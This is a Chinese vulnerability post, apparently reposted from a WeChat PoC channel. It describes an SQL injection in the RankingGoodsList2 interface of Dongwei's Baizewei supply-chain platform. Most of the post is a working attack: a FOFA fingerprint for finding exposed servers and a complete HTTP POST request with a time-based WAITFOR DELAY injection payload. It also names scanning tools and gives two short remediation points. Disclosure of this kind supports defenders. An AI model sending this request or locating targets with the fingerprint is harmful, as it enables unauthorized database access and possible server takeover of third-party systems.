懂微百择唯·供应链 RankingGoodsList2 SQL注入致RCE漏洞 pOC

2024年12月3日13:32:41评论19 views字数 863阅读2分52秒阅读模式

产品简介

懂微科技是一家专注于办公服务行业电商解决方案的提供商，致力于为办公服务行业赋能、提升效率和核心竞争力。百择唯·供应链作为懂微科技的重要产品之一，旨在通过数字化手段优化办公服务行业的供应链管理，提升采购效率，降低采购成本，增强企业的盈利能力。适用于各种需要优化供应链管理、提升采购效率的企业。同时，通过与合作伙伴的共享共建，构建完善的供应链生态体系，提升整体运营效率和市场竞争力。

漏洞概述

懂微百择唯·供应链 RankingGoodsList2 接口存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码,站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

搜索引擎

FOFA:

body="/Content/Css/_SiteCss/"

懂微百择唯·供应链 RankingGoodsList2 SQL注入致RCE漏洞 pOC

漏洞复现

POST /Goods/RankingGoodsList2 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: keep-alivegoodsSortType=Recommend&goodsTypeList%5B%5D=1%';WAITFOR DELAY '0:0:5'--

延时5秒

sqlmap验证

检测工具

nuclei

afrog

xray

修复建议

1、关闭互联网暴露面或接口设置访问权限

2、升级至安全版本

原文始发于微信公众号（nday POC）：懂微百择唯·供应链 RankingGoodsList2 SQL注入致RCE漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

懂微百择唯·供应链 RankingGoodsList2 SQL注入致RCE漏洞 pOC

74cmsRCECVE-2024-2561 POC

CVE-2025-21535｜Oracle WebLogic Server远程代码执行漏洞

畅捷通T+ FileUploadHandler任意文件上传漏洞

Confluence OGNL注入漏洞复现(CVE-2022-26134)

7-Zip Web标记绕过漏洞[CVE-2025-0411]-POC

CVE-2024-9593 WordPress 远程代码执行

CVE-2024-49113LDAP 噩梦：2025 年首个 PoC 漏洞针对关键 Windows 漏洞

Windows 文件资源管理器权限提升漏洞（CVE-2024-38100）

AdForest <= 5.1.8 — 身份验证绕过

锐捷EWEBauth远程命令执行漏洞 POC

发表评论

在线咨询

微信